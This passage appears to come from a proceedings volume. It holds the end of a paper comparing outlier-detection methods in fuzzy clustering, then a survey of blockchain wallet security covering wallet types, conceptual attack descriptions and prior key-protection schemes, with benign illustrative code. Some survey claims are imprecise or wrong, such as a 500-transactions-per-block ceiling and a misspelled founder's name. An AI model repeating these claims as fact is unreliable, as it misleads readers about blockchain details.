\frac{\left\| \{\, x_j \mid dist(x_i, x_j) \le r \,\} \right\|}{\left\| X \right\|} \le \pi   (4)

Based on this concept, a variation of the distance-based outlier is proposed by Gosain
and Dahiya [13], which is based on the spread of the data: it determines the minimum
number of data objects that must be in close proximity, say k, and then determines the
neighborhood radius as per Ester et al. [14]; if the distance to the kth nearest neighbor of
any data object is greater than the neighborhood radius, then that data object is an outlier.
The mathematical formulation of outlier identification [13] is as follows:

\left\| \{\, x_j \mid dist(x_i, x_j) \le r_{Outlier\_Spatium} \,\} \right\| < knn \quad \text{for } \forall j \in [1 \ldots N],\ j \ne i   (5)

x_i = \begin{cases} \text{Outlier} & \text{if } \left\| \{\, x_j \mid dist(x_i, x_j) \le r_{Outlier\_Spatium} \,\} \right\| < knn \\ \text{Not Outlier} & \text{if } \left\| \{\, x_j \mid dist(x_i, x_j) \le r_{Outlier\_Spatium} \,\} \right\| \ge knn \end{cases} \quad \text{for } \forall j \in [1 \ldots N],\ j \ne i   (6)

where knn is the number of k-nearest neighbors, computed as knn = \|X\| \cdot f\_X, \|X\| is the dataset size, and f_X is a fraction of the dataset. x_j and x_i are the jth and ith data objects of the dataset X, and dist(x_i, x_j) = \sqrt{\sum_z (x_{iz} - x_{jz})^2} is the Euclidean distance between data objects x_i and x_j. r_{Outlier\_Spatium} is the outlier spatium, which is computed using knn = \|X\| \cdot f\_X and the approach defined by Ester et al. [14].
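
The following NumPy sketch illustrates Eqs. (5) and (6) under the simplifying assumption that r_Outlier_Spatium is supplied directly rather than derived through the k-distance procedure of Ester et al. [14]; it is not the implementation of [13], and the toy data and fraction f_X are placeholders.

import numpy as np

def db_outliers(X, r_outlier_spatium, f_X=0.05):
    # Distance-based (DB) outlier flags following Eqs. (5)-(6): x_i is an outlier
    # if fewer than knn other objects lie within r_Outlier_Spatium of it.
    n = len(X)
    knn = max(1, int(round(n * f_X)))                 # knn = ||X|| * f_X
    diff = X[:, None, :] - X[None, :, :]
    dist = np.sqrt((diff ** 2).sum(axis=-1))
    within = (dist <= r_outlier_spatium).sum(axis=1) - 1   # neighbours, excluding the point itself
    return within < knn                               # True marks an outlier

# Toy usage with an illustrative radius.
X = np.vstack([np.random.randn(50, 2), [[15.0, 15.0]]])
print(db_outliers(X, r_outlier_spatium=1.5, f_X=0.1))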

3 DO Versus DB

In this section, we have compared DO and DB. In Sect. 3.1, step-by-step working is
discussed on two standard datasets. In Sect. 3.2, performance analysis on number of
standard datasets is discussed.

3.1 Dataset Used

For this work, four standard datasets are used: D12, D15, D115, and Bensaid. A brief
description of each dataset is given in Table 1.

3.2 Performance Analysis of DO and DB on Various Dataset

Figures 2 and 3 show outlier identification using the DO and DB algorithms on the D12
dataset for various threshold values (0.05, 0.10, 0.15, 0.20, 0.25), respectively. From

Table 1 Brief of datasets
                      D12                     D15                     D115                        Bensaid
Size of dataset       12                      15                      115                         298
Number of clusters    2                       2                       2                           3
Features of dataset   Uniformly distributed   Uniformly distributed   Random shaped, almost       Highly density and size
                      identical clusters      identical clusters      equal density clusters      varying clusters


Fig. 2 Working of DO on D12 for various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25

Figs. 2, 3, and Table 2, it can be observed that DB is able to identify the noise and
outliers, whereas DO identifies only one outlier over the 0.0–0.35 threshold range.
Figures 4 and 5 show the step-wise outlier identification process of DO and DB for
the D115 dataset on various threshold values (0.05, 0.10, 0.15, 0.20, 0.25), respec-
tively. From Figs. 4, 5, and Table 2, it can be observed that DB shows high stability
in outlier identification, as for the threshold value range 0.0–0.35 the count of outliers
is 8–10, whereas for the same range DO shows a count of outliers from 9 to 37.
For a further detailed analysis of the performance of DO and DB, results are represented
using histograms in Figs. 6, 7, and 8. For all these plots, the x-axis shows the threshold
value and the y-axis shows the number of outliers; red colored bars are for DB results
and green colored bars are for DO results. It is observed from these histograms that
DB shows higher stability and accuracy in the identification of outliers, is not
hypersensitive to the choice of threshold value, and converges on a threshold value
more quickly than the density-based method.


Fig. 3 DB on D12 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25

Table 2 Performance analysis on D12 and D115 (number of outliers)
Threshold value    D12 (DB)    D12 (DO)    D115 (DB)    D115 (DO)
0.01–0.06          1           1           10           9
0.07–0.13          1           1           10           10
0.14–0.16          1           1           10           14
0.17–0.20          2           1           9            14
0.21–0.25          2           1           9            21
0.26               1           1           9            21
0.27–0.32          1           1           9            31
0.33               1           1           9            31
0.34               3           1           9            37
0.35               3           1           8            37

4 Conclusion

In this paper, we have compared a density-based outlier identification method and a
distance-based outlier identification method in the context of fuzzy clustering. The
experiment is performed on standard datasets (D12, D15, D115, and Bensaid), and the
experimental results show that the distance-based method offers higher stability and
accuracy in the identification of outliers, and is not


Fig. 4 DO on D115 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25, f 0.30

hypersensitive to the choice of threshold value, converging on a threshold value more
quickly than the density-based method.


Fig. 5 DB on D115 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25


Fig. 6 DO versus DB on D15



Fig. 7 DO versus DB on D115

Fig. 8 DO versus DB on Bensaid dataset

References

1. Hawkins, D. M. (1980). Identification of outliers (Vol. 11). London: Chapman and Hall.
2. Wu, X., Kumar, V., Ross Quinlan, J., Ghosh, J., Yang, Q., Motoda, H., McLachlan, G.J., et al.
(2008). Top 10 algorithms in data mining. Knowledge and Information Systems 14(1).
3. Ye, Xi., Zongxiang, Lu., Qiao, Y., Min, Y., & O’Malley, M. (2016). Identification and correction
of outliers in wind farm time series power data. IEEE Transactions on Power Systems, 31(6),
4197–4205.
4. Forero, P. A., Shafer, S., & Harguess, J. D. (2017). Sparsity-Driven Laplacian-regularized
outlier identification for dictionary learning. IEEE Transactions on Signal Processing, 65(14),
3803–3817.
5. Bezdek, J. C., Ehrlich, R., & Full, W. (1984). FCM: The fuzzy c-means clustering algorithm.
Computers & Geosciences, 10(2–3), 191–203.
6. Gosain, A., & Dahiya, S. (2016). Performance analysis of various fuzzy clustering algorithms:
A review. Procedia Computer Science, 79, 100–111.
7. Dahiya, S., Gosain, A., & Mann, S. (2020). Experimental analysis of fuzzy clustering
algorithms. InIntelligent data engineering and analytics (pp. 311–320). Singapore: Springer.
8. Dahiya, S., Gosain, A., & Gupta, S. (2020). RKT2FCM: RBF Kernel-Based Type-2 Fuzzy
Clustering. Available at SSRN 3577549.
9. Dahiya, S., Nanda, H., Artwani, J., & Varshney, J. (2020). Using clustering techniques and
classification mechanisms for fault diagnosis. International Journal, 9(2).
10. Han, J., Kamber, M., & Pei, J. (2006). Data mining, southeast asia edition: Concepts and
techniques. Morgan Kaufmann
11. Kaur, P., & Gosain, A. (2010). Density-oriented approach to identify outliers and get noiseless
clusters in Fuzzy C—Means. In 2010 IEEE International Conference on Fuzzy Systems (FUZZ)
(pp. 1–8). IEEE.
12. Kaur, P., & Gosain, A. (2011). A density oriented fuzzy C-means clustering algorithm for recog-
nising original cluster shapes from noisy data. International Journal of Innovative Computing
and Applications, 3(2), 77–87.

13. Gosain, A., & Dahiya, S. (2020). A new robust fuzzy clustering approach: DBKIFCM. Neural
Processing Letters, 52(3), 2189–2210.
14. Ester, M., Kriegel, H.-P., Sander, J., & Xiaowei, Xu. (1996). A density-based algorithm for
discovering clusters in large spatial databases with noise. Kdd, 96(34), 226–231.
Analysis of Security Issues in Blockchain
Wallet

Taruna and Rishabh

Abstract Blockchain is a substantive technology which provides reliable and conve-
nient services by establishing trust in an open environment. Blockchain basically
relies upon two critical technological areas, cryptography and decentralization, to
perform transactions of confidential data. This technology has been gaining traction since
its introduction in 2008 due to its ability to accomplish immutable transactions without
third-party interference. Owing to these astonishing features, it has become the backbone
of many industries and businesses including digital financing, e-Governance, smart grids,
etc. Many banking and financial service providers have started to allot wallets to
their customers, where they can use money in a highly secure environment. However,
although blockchain is considered the most secure technology available today, its wallet
is still not tamper-proof. This paper aims to analyse various issues pertaining to
blockchain wallet security. The existing developments in this area are studied in
detail to pave a future direction of research in this regime. Section 1 is an introduction
to blockchain, which includes blockchain wallets and their types, security issues in
wallets, and the security practices used to resolve those issues. Section 2 includes wallet
security challenges, vulnerabilities, and a recent review of literature on wallet security
practices. Section 3 compares the related work and discusses the growth in crypto crimes
due to loss of cryptocurrency. The last section concludes the paper.

Keywords Blockchain · Blockchain wallet · Cryptocurrencies · Cryptography ·


Wallet security · Crypto loss

1 Introduction

Blockchain has been gaining traction every day since it was introduced by Satoshi Nakamoto
in 2008 as a technology to support cryptocurrency [1]. It was initially invented for
Taruna
DPG Degree College, Gurugram, Haryana 122001, India
Rishabh (B)
ABES Engineering College, Ghaziabad, Uttar Pradesh 201009, India


Bitcoin, but in later years it has found implications and applications in the areas of finance,
governance, energy grids, the Internet of Things (IoT), healthcare, businesses and indus-
tries, supply chain management, and education, as well as security and privacy, and many more [2–
5]. Although various blockchain-based cryptocurrencies such as Ethereum, Cardano,
Nano, Vertcoin, etc. have been issued by digital financing companies in the recent past,
Bitcoin still has the largest market capital [6]. This immutable technology is
considered immune to third-party interference, but owing to its widespread popularity,
it is a hot target for cyber hackers [7]. These cyber risks are considered a prime
concern in financial transactions involving critical information. With the evolution
of the internet, security has become an even greater concern. Satoshi instigated blockchain,
which is considered, by far, the most secure technology for the exchange of information and
funds on an online platform [8].
Blockchain technology owes its popularity to its decentralized and peer-to-
peer transaction capability [9]. Trust is the major issue with any centralized
system which involves a third party for communication, but blockchain has the
capability of peer-to-peer transaction, so it removes the need for the presence of any
third party in a transaction [10]. In other words, the sender and receiver, the two peers
in any transaction, can communicate directly. Decentralization of blocks builds a
trustworthy system because everyone can use it anywhere, anytime, with an internet
connection.
Blockchain is a list of records called blocks. A number of blocks, created from
multiple series of transactions, are connected to form a chain called a ledger. This
ledger is distributed across all nodes in the network, and all the nodes in the
network are given a copy of the ledger to save, making it a public distributed
ledger, as shown in Fig. 1. Due to this decentralization, the risk of data tampering
reduces and data become more cryptographically secure than in any centralized system [11].
Blockchain is basically of three types: public, private, and hybrid. But [12] categorizes
blockchain in a novel way as cryptocurrency blockchain (C2C), business-to-cryp-
tocurrency blockchain (B2C), and business-to-business blockchain (B2B), depending on
its applications.
A blockchain structure has majorly two components: one is its header and the other
holds the transaction details. The block header contains all the details required to
carry out a transaction in the blockchain [13]. It has a wallet address, which is basically
the address of a node in the form of numbers and letters, and which is public. In any transaction

Fig. 1 Public distributed ledger

Fig. 2 Attributes of a blockchain block

detail, only the numbers of a wallet will be visible; no record of the person(s) can be
found. On the contrary, a private key is a string of random numbers which is known
only to the person to whom it belongs. When a transaction is performed by a node
in the network, it will sign the transaction using its private key [14, 15] (Fig. 2).
Each block, along with the wallet, has the hash value of its own block and of the previous block.
The hash value of a block is a unique identifier, which is generated by using a hash
function. To impart more security to a block, a trusted hash value can be generated
using the transaction record and the previous block's hash value, as shown in Fig. 3. Such a hash
is more secure because if someone tries to change the hash of a block, they need
to change the hashes of all subsequent blocks, which is almost impossible to achieve.
To further enhance the security and make the blocks more secure and reliable, a nonce
is added to each block. Each transaction basically has the details of the transaction
along with the wallet addresses of both sender and receiver and the digital signature of the
sender. These details are encrypted using different encryption methods depending
on the implementation.
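
The chaining of hash values described above can be illustrated with a short Python sketch. The block fields, the use of SHA-256 over a JSON payload, and the toy transactions are illustrative assumptions only and do not correspond to the block format of any particular blockchain.

import hashlib
import json

def block_hash(transactions, previous_hash, nonce):
    # Illustrative block hash: SHA-256 over the transaction record,
    # the previous block's hash, and a nonce (field names are made up).
    payload = json.dumps({"tx": transactions, "prev": previous_hash, "nonce": nonce},
                         sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

# Build a tiny three-block chain.
chain = []
prev = "0" * 64                                       # placeholder hash for the genesis block
for nonce, tx in enumerate([["A->B:5"], ["B->C:2"], ["C->A:1"]]):
    h = block_hash(tx, prev, nonce)
    chain.append({"tx": tx, "prev": prev, "nonce": nonce, "hash": h})
    prev = h

# Tampering with the first block changes its hash, so the link stored in the next
# block no longer matches and every later block would have to be recomputed too.
chain[0]["tx"] = ["A->B:500"]
print(block_hash(chain[0]["tx"], chain[0]["prev"], chain[0]["nonce"]) == chain[1]["prev"])  # False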
A block can store the details of multiple transactions, but not more than a ceiling of
about 500 transactions per block. Once a block reaches that limit, a new block is
created. Satoshi proposed an upper limit of 1 Megabyte (MB) on the size of a block [1].
It can grow up to 8 MB and sometimes more [4]. The size of a block limits the number
of transactions verified with each block by a miner: the bigger the block size, the more
transactions are verified.

Fig. 3 Hash and Previous hash values in blocks of blockchain



1.1 Blockchain Wallets

A blockchain wallet is a digital locker, basically a program, that permits users to
manage their cryptocurrency. It holds the public and private keys of a user to
encrypt transaction details. A transaction is successful only if there is a match between the
public and private keys of a blockchain.
Wallets can be categorized into multiple varieties, but the majorly used wallet
categories include the following three types, depending on where a wallet is stored
[16].
Software Wallet: As the name implies, these wallets are stored in the system, either a
computer device or mobile device, or online using a Web browser. They come with the
advantage of easy use, but security, hacking, and the need for regular backups are some pitfalls
of these wallets.
Hardware Wallet: These wallets are popular due to their high security and safety
compared to software wallets. Hardware wallets can store users' private keys of the blockchain
system on a hardware device such as a Universal Serial Bus (USB) device, but
they are costly to buy and use.
Paper Wallet: These are cold storage wallets where the blockchain public and private
keys are generated through an application and then printed as a Quick Response
(QR) code to process a transaction. They are the safest, as the holder only has to be
concerned with keeping the paper safe. But the time taken by such wallets is high
because QR code scanning is involved in every transaction.

1.2 Security Issues in Blockchain Wallets

All the cryptocurrencies used so far are based on a cryptographic public–private key
system. Public keys are known to everyone and are included in every transaction detail
to show the target of the funds transferred. On the other hand, the private key is used for
authentication and signing a transaction, and it is known only to the person it belongs
to. Any transaction is associated with an address, and the generation of this address
needs the private key of the sender. The blockchain wallet emerges in such a scenario:
it automatically generates and stores a private key for each transaction without
disclosing it to anyone [17].
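
A minimal illustration of this public–private key signing is given below using the third-party python-ecdsa package purely as an example; the curve and the message format are assumptions made here and are not those of any specific wallet or cryptocurrency.

# pip install ecdsa  (third-party package, used here purely for illustration)
from ecdsa import SigningKey, SECP256k1

# The wallet generates and stores the private key; the public key/address is shared.
private_key = SigningKey.generate(curve=SECP256k1)
public_key = private_key.get_verifying_key()

# The sender signs the transaction detail with the private key ...
transaction = b"send 0.5 coin from wallet-A to wallet-B"
signature = private_key.sign(transaction)

# ... and any node can verify it with the sender's public key,
# without ever seeing the private key itself.
print(public_key.verify(signature, transaction))      # True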
The main issue with blockchain private keys is that a key is a random alphanumeric
string which is very hard for a human being to remember. Traditionally, the storage mecha-
nisms for private keys are memorization of the key, cold wallets, keeping the key structure
simple so that it can be memorized, use of a wallet provider for keeping the key, and storing
keys in encrypted wallets [18]. All these methods have one or more problems like the
complexity of the private key, cold wallet insecurity, inefficiency of encrypted digital
keys, etc.

1.3 Wallet Security Practices

The threat to cryptocurrency mainly surfaces when it is kept in a digital wallet. As
we know, a blockchain wallet does not store cryptocoins; rather, it holds a private
key and public key which permit the user to make crypto transactions. A private key is
the identity of a user in the crypto market, and a thief can use it purposefully to make fraudulent
transactions and steal your assets. Following are some traditional methods used to
secure cryptocurrencies:
Cold Wallet: A hot wallet is an online wallet which stores currency online. But
unlike hot wallets, cold wallets need no internet connection, which reduces the probability
of cyber-attacks. A cold wallet can also be called a hardware wallet and is the most
practical option to keep crypto keys.
Multiple Wallets: A user can maintain any number of wallets for crypto exchange,
for example one for daily exchange holding fewer assets and other wallets to keep large
assets. This mitigates the stealing of cryptocurrencies.
Secure Device and Internet: A secure internet connection and a secure device play a key role
in the security of a digital wallet. If these are not secure, then using any other security
algorithm for the private key is of no use. Using a Virtual Private Network (VPN) to
change the Internet Protocol (IP) address and location makes the browser safer. Antivirus
protection, VPN security, and the use of firewalls are some of the preventive measures
adopted to secure wallets. Another popular method for internet security is to
change passwords regularly.
Back-up of Wallet: It is safe to always keep a backup of the digital wallet so that if the
user loses the device or it is stolen, they can still have access to the wallet. This will not
provide any security in itself, but keeping a backup can restore access to the wallet.
Two-factor Authentication: A digital wallet is usually protected by a password to
secure it. But to enhance security, one can have two-layer authentication: the first is the
password and the second is the sending of a code to the user's registered phone or email id. It
bolsters wallet security by keeping unauthorized attackers away.

2 Literature Review

As an emerging technology, blockchain faces many problems and challenges. To
have a clear picture of the state of security of blockchain wallets, we have performed
an in-depth survey of the existing issues in the area under study. Initially, not much
work was done on securing the private key, as crypto crimes were not that high, but
with the increase in the number of wallet users from less than 10 million in 2016 to
around 55 million in the second quarter of 2020, research in this area also grew.
About 50% of the research on wallet security is observed to have happened during the last
two years. Since crypto crimes have been doubling each year since 2017, the security issue
of blockchain wallets deserves imperative study. A classified study of blockchain
wallet security is enunciated in the subsequent sub-sections.

2.1 Security Challenges

The blockchain technology possesses astonishing features like anonymity, confiden-
tiality, and security [5]. The information of each transaction in a block is encrypted
by complex algorithms for enhanced security. Each transaction is also validated by
nodes using a consensus protocol, and transactions are secured by cryptography [4].
The use of cryptography, i.e. public key–private key algorithms, does not make it a substi-
tute for Public Key Infrastructure (PKI). Actually, blockchain technology makes use
of PKI to pick out and authenticate members which can take part in the blockchain
network.
Each transaction in blockchain is associated with a pair of keys. Although
blockchain preserves the anonymity and confidentiality of each transaction, with
poor management of private keys cryptocurrencies might be stolen or lost forever
[19]. This is supported by an article in CipherTrace, which states that cryptocurrency
valued at United States (US) $1.4B was stolen in just the first five months of the year 2020
[20]. It turns our focus towards key management and security in cryptocurrencies.
A blockchain wallet holds public as well as private keys in an asymmetric key model
of security. According to Jokić et al., wallets have majorly two categories, viz.
cold wallets and hot wallets, which can be further categorized as online wallets,
hardware wallets, paper wallets, mobile wallets, and desktop wallets; each of them
possesses its own set of merits and demerits [16].
There are several methods proposed for the security, storage, and management of
the private key in these wallets. An intruder can use any method like weak encryption,
channel attacks, brute force, replay attacks, etc. to learn keys and get access to a
targeted system. So, a PKI infrastructure can never be secure unless its keys are protected.

2.2 Wallet Vulnerabilities

Almost all available wallets back up private keys as mnemonics, which are hard for
the user to remember. To remember them, a person has to write the private key mnemonic
on a paper, which is an inconvenient and insecure way. Rezaeighaleh and Zou have
presented a backup scheme for hardware wallets using which one can transfer a private
key from one wallet to another using an untrusted terminal [21]. This strategy creates
two wallets with the same keys and provides the opportunity for the user to use one as the main
wallet and the other as a backup wallet.
Blockchain itself is facing a lot of security issues [22]. But blockchain wallets are
the easiest and main prey for attackers. People always rely on and trust blockchain
security, seeing its benefits and overlooking its weaknesses. Cybercriminals can
use traditional hacking methods for attacking wallets, or they can go ahead to find
and explore new ways to get access to the private key [23]. This section mainly focuses
on such users' vulnerabilities for wallets in blockchain, as enunciated below:

Phishing Attack: It is a social engineering attack which is usually used by
cybercriminals to imitate a user and make fraudulent money transfers using the wallet
address [24]. The attacker's goal is to steal information like users' domain names and
other login credentials for masquerading as the real user. In 2018, there was a phishing
campaign which targeted IOTA wallets and stole an amount of US$4 million [25].
Dictionary Attacks: It is a brute-force method of cracking a password by trying each
word of a dictionary. In blockchain, a dictionary attack can be used by cyber-
criminals to search for the private key of a user and use it to find wallet credentials
[25].
Vulnerable Signatures: Various algorithms like the Elliptic Curve Digital Signature
Algorithm (ECDSA), Rivest–Shamir–Adleman (RSA), etc. are used by blockchain
networks to create signatures for users. These cryptographic algorithms generate a
'nonce' (a random number) for each signature. Breitner and Heninger have shown
that there are chances that an attacker can compute the private key used in signing if
the nonce is not generated properly [26]. They have stated two reasons behind it:
one is a shorter length of the nonce than expected, and the other is common Least
Significant Bit (LSB) or Most Significant Bit (MSB) values.
ROCA: It is a private key vulnerability in which the private key can be guessed
from its corresponding public key. As we know, blockchain uses public–private key
cryptography for encrypting messages and signing transactions. ROCA arises from a flawed
key generation system: depending on the vulnerability of the public keys, an algorithm
can be designed to crack the private key without much effort [27].
Cold Wallet Vulnerabilities: Although there are very low chances of such an attack,
it is also possible that hardware or cold wallets can be tampered with by knowing the
wallet credentials and transaction timings, etc. Recently, in 2019, the South Korean
cryptocurrency exchange Upbit lost US$48.5 million in cryptocurrency
while transferring funds to a cold wallet. The security drawback of cold
wallets is that they lack backup and recovery [28].
Hot Wallet Vulnerabilities: Hot wallets are most prone to attacks. In these wallets,
keys are stored on online servers. These servers, despite having tight security, have a
higher possibility of vulnerable attacks as compared to cold wallets [29].

2.3 Recent Progresses

During the consensus phase, it is very important to check the integrity and authen-
ticity of data as well as to restrict false stations from entering, in order to secure the wallet. There are
many chances of attacks like phishing, hot wallet attacks, etc. in the consensus phase.
Researchers have proposed various algorithms in which they suggest layering systems,
implemented in different ways, to protect the wallet. Om Pal et al. have analysed the existing
PKI and the necessity of key management for the blockchain wallet [11]. For secure
group communication during the consensus phase, a group key management (GKM)
scheme was proposed by them. A multi-layer system architecture was proposed and

tested. It is assumed that upper-layer nodes have been given more rights and privileges,
while nodes at the same level have the same privileges.
Gan et al. have also presented a double-layered structure for blockchain in which Central-
ized Certificate Authorities (CCA) have the power to store public keys and add IoT
nodes for the inner layer, and inner nodes in turn can store public keys and add nodes for the
outer layer [11, 29, 30]. Matsumoto and Reischuk have shown that any misconduct
of Certificate Authorities (CA) can be regulated by consensus of the nodes, known as
Instant Karma PKI [31]. The Guardtime approach suggested the use of Physical Unclon-
able Functions (PUF) for the identification of IoT devices by using the physical properties of
the device for the required output [32]. A distinctive public–private key pair is generated
using this output, and these keys are then used in blockchain transactions. Although
too many layers are suggested, an attacker can still invade through them. Also,
these models require a lot of computation and are hard to implement.
He et al. have presented a more secure, semi-trusted, portable social-network-
based wallet-management technique with advanced features of security, portability,
authentication and recovery [33]. They review related wallet management tools
presented in [34–37] to come up with a system design having more secure storage,
portable remote login on multiple devices, authentication without password, blind
wallet recovery, etc. The system model has four entities—User (U), Management
device (M), Proxy (P) and Central Server (C). M acts as representative of U and
memorize its sensitive data. P can be on any smart device using which the user can
remotely log in and perform a transaction. Performance analysis of the proposed
system shows enhanced security and a fully functional wallet with little overhead and
time delay (in milliseconds).
Ning Wang and others have proposed an algorithm to improve security [38]. The
method used by them secures the private key of the blockchain by storing it using an image
steganography technique. In their scheme, first the private key is padded with some
random number, then converted to a binary matrix, and later, to minimize errors during
transmission, an error correction code is included. The system is shown to have high
robustness, transparency, and hence high security. Various other researchers have
proposed techniques to combine steganography with cryptography to implement
key management in a blockchain wallet [39–42].
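
A much-simplified least-significant-bit embedding, which omits the random padding and error correction coding used in [38], might look as follows; the cover image, key size, and bit layout are illustrative assumptions only.

import numpy as np

def embed_key(image, key_hex):
    # Hide the bits of a (hex-encoded) private key in the least significant bits of an image.
    bits = np.unpackbits(np.frombuffer(bytes.fromhex(key_hex), dtype=np.uint8))
    flat = image.flatten()
    flat[: bits.size] = (flat[: bits.size] & 0xFE) | bits      # overwrite the LSBs
    return flat.reshape(image.shape)

def extract_key(image, n_bytes):
    # Recover the hidden key by reading back the least significant bits.
    bits = image.flatten()[: n_bytes * 8] & 1
    return np.packbits(bits).tobytes().hex()

# Toy usage: a random 64x64 grayscale "image" and a 32-byte key.
cover = np.random.randint(0, 256, size=(64, 64), dtype=np.uint8)
key = "ab" * 32
stego = embed_key(cover, key)
print(extract_key(stego, 32) == key)                           # True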
Hosam presented a fractal steganographic technique to secure the blockchain wallet, as
it holds the keys which are used for purchasing and selling coins, most importantly
the user's private key [43]. Boiangiu et al. have used fractal trees to hide the private key.
A fractal is a complex image generated using iterations of a single formula, using
different values in each iteration and the result of the previous iteration [44].
Research by Ma and Sun has taken advantage of blockchain for decen-
tralization and stronger security in IoT, where the problem with existing key management
schemes is their dependence upon centralized authentication [45]. On the other hand,
Tian et al. used these features of blockchain in dynamic wireless sensor networks
(WSNs) used in industrial IoT [46]. A comparison of the various research works is
given in Table 1.
Zhu et al. introduced an architectural framework of a high availability (HA) eWallet,
which is an online wallet [47]. They have adopted an active architectural scheme.

Table 1 Comparison of related work
Author | Proposed method | Benefits | Shortcomings
Om Pal et al. [11] | Group key management scheme | Security enhanced | Lot of computational resources required
Gan et al. [29] | Two-layer blockchain architecture | Security enhanced | High cost of implementation [50]
He et al. [33] | Cryptocurrency wallet management system | Low time delays, enhanced security and recovery | Full recovery of system not possible in certain cases
Wang et al. [38] | Blockchain key storage method based on image steganography | Improved transparency, security and robustness of private key | In case of signal attack, private key cannot be accurately extracted
Ma et al. [45] | Group key management scheme | Efficient scheme for dynamic WSNs | Base stations are not fully reliable
Hosam [43] | Hiding bitcoins in steganographic fractals | The proposed system is robust to many attacks like hardcopy and image attacks | Transparency and capacity are not considered
Zhu et al. [47] | High availability eWallet (HA-eWallet) architecture | Higher availability than traditional online wallets | System failure in case of failure of all service units and the disaster recovery centre

The work of Engelmann et al. has two service units, viz. a transaction gateway and
two storage units [48]. Fangdong Zhu proposes three models, viz. a normal dual-master
model based on the multi-signature technology put forward by [49], where Zhu
uses a 3-of-5 scheme, i.e. generate 5 keys randomly and sign the transaction using
3 of them. The other 2 keys are chosen and encrypted randomly and then
sent to the transaction gateway separately. These keys are stored in the storage units, and all
the data should be backed up periodically to a 'disaster recovery centre'. The other two
models, the Simplex and Recovery models, are used in case of one or both storage units'
failure, respectively. The authors guaranteed the smooth and secure functioning of the
architecture up to a loss of 50% of users' private keys in total [50].

3 Comparative Analysis

The above literature study reveals that making the private key more secure is the most
effective way to protect the wallet from hackers and attackers. In this section, we
analyse the benefits and shortcomings of some of these approaches to find the best solution ahead.
A comparison of the related research work is given in Table 1.
Various news items and research reports reflect that the loss due to breaches of crypto-
systems is enormous [51–53, 54]. As per these reports, cryptocurrency crimes
have surpassed a figure of US$ 1.36 billion in the five months till May 2020 alone. It
is predicted to be the second highest crime year in terms of cryptocurrencies. Last

Table 2 Cryptocurrency losses due to crypto crimes
Year | Loss due to crypto crimes (in US dollars)
2020 (till May) | 1.36 Billion
2019 | 4.5 Billion
2018 | 1.7 Billion
2017 | 266 Million
2016 | 242 Million
year, in 2019, the total crypto losses due to hacks and frauds were recorded to be $4.5
billion, as enunciated in Table 2.
Apart from this, there were two major losses in the first three months of the year 2019
which resulted in massive crypto loss [54]. As a specific event, one major loss in
2019 was noted on the sudden demise of Mr Gerry Cotton, founder and CEO of a Canadian
cryptocurrency exchange platform. As per the reports, it is speculated that
Cotton had printed clients' private keys and used cold wallets to store them. This
incident puts a question mark on the security levels of cold wallets.
A Web-based study from Reuters states that in 2018, out of the $1.7 billion of digital
currency losses, $950 million was just because of crypto exchanges and infrastructure
services like wallets [52]. Analysing the records of the past five years, from 2016 to May
2020, reveals that crypto crime losses moved almost linearly during 2016 to 2017;
there was not much increase in crypto crimes, but from 2018 onwards they seem to
increase exponentially. Figure 4 envisages the spike in the number of crypto crimes
during the past five years. Solid lines in the chart show complete-year data and the dotted
line shows the data of the current year till May 2020.

Fig. 4 Cryptocurrency loss due to crypto crimes



4 Conclusion

Security and privacy issues go hand-in-hand. All transactions in blockchain involve
the wallet private key. Therefore, securing the wallet must be a prime concern for all wallet
holders. However, blockchain wallet security is a nascent area of research, and not
much work has been done in this regime. This research paper has studied the work
done so far in the management and security of the private key of the blockchain wallet. The
analysis in Sect. 3 envisages that no work done so far is absolute and every approach
suffers from serious shortcomings. It is reported from this study that security and lack
of transparency are the serious concerns in this regime. Other issues involve too
complicated and costly implementations. None of the models presented so far is practi-
cally implementable to improve security to much depth. The analysis of past years'
records of cryptocurrency frauds and thefts shows an exponential curve, which is
alarming and fetches urgent attention towards the security of the blockchain wallet infras-
tructure. Therefore, this area is open, offering a challenge to the researcher community. In
future, more research needs to be carried out on private key storage and security.


References

1. Nakamoto, S. (2008). Bitcoin: A peer-to-peer electronic cash system.


2. Sengupta, J., Ruj, S., & Bit, S. D. (2020). A Comprehensive survey on attacks, security issues
and Blockchain Solutions for IoT and IIoT. Journal of Network and Computer Applications,
149, 102481. ISSN 1084–8045.
3. Casino, F., Dasaklis, T. K., Patsakis, C. (2019). A systematic literature review of blockchain-
based applications: Current status, classification and open issues. Telematics and Informatics,
36, 55–81. ISSN 0736-5853.https://doi.org/10.1016/j.tele.2018.11.006
4. Mohanta, B. K., Jena, D., Panda, S. S., & Sobhanayak, S. (2019). Blockchain technology: A
survey on applications and security privacy challenges. Internet of Things, 8, 100107. ISSN
2542-6605.https://doi.org/10.1016/j.iot.2019.100107
5. Sisodiya, V. S., & Garg, H. (2020). A comprehensive study of Blockchain and its various
Applications. In 2020 International Conference on Power Electronics & IoT Applications in
Renewable Energy and its Control (PARC), Mathura, Uttar Pradesh, India (pp. 475–480).
https://doi.org/10.1109/PARC49193.2020.236659
6. “COinMarketCap. https://coinmarketcap.com/all/views/all/. Accessed on Oct. 21, 2020.
7. Taylor, P. J., Dargahi, T., Dehghantanha, A., Parizi, R. M., Raymond Choo, K.-K. (2020).
Systematic literature review of blockchain cyber security. Digital Communications and
Networks, 6(2), 147–156, ISSN 2352-8648. https://doi.org/10.1016/j.dcan.2019.01.005
8. “Blockchain Edify”. https://blockchainedify.com/2020/09/26/what-is-blockchain-technology/
9. Ghimire, S., & Selvaraj, H. (2018). A survey on bitcoin cryptocurrency and its mining. In 2018
26th International Conference on Systems Engineering (ICSEng), Sydney, Australia (pp. 1–6).
https://doi.org/10.1109/ICSENG.2018.8638208

10. Rajput, S., Singh, A., Khurana, S., Bansal, T., & Shreshtha, S. (2019). Blockchain tech-
nology and cryptocurrenices. In 2019 Amity International Conference on Artificial Intelli-
gence (AICAI), Dubai, United Arab Emirates (pp. 909–912). https://doi.org/10.1109/AICAI.
2019.8701371
11. Pal, O., Alam, B., Thakur, V., & Singh, S. (2019). Key management for blockchain technology.
In ICT Express, ISSN 2405-9595. https://doi.org/10.1016/j.icte.2019.08.002
12. Sabah, S., Mahdi, N., & Majeed, I. (2019). The road to the blockchain technology: Concept
and types. Periodicals of Engineering and Natural Sciences (PEN) (Vol. 7, pp. 1821–1832),
